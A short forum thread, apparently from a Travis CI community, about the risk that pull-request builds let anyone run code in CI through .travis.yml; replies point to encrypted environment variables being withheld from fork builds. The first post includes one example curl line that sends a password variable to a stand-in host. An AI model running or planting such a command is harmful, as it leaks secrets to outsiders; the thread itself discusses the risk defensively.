A risk about `Build pushed pull requests`

#1

If we enable Build pushed pull requests, PRs will trigger builds.

Anyone can modify .travis.yml file in a PR, that means if Build pushed pull requests is turned on, the attackers can do anything in CI.

Such as:

curl http://example.com/xxx?v=$password

How to get rid of this risk?

#2

Use encrypted environment variables.

Encrypted environment variables are not available to pull requests from forks due to the security risk of exposing such information to unknown code.

https://docs.travis-ci.com/user/environment-variables/#defining-encrypted-variables-in-travisyml

1 Like
#3

You cannot use encrypted variables on PR builds (from forks) due to security risks. https://docs.travis-ci.com/user/pull-requests/#pull-requests-and-security-restrictions

1 Like
#4

Thank you very much

#5

Thank you too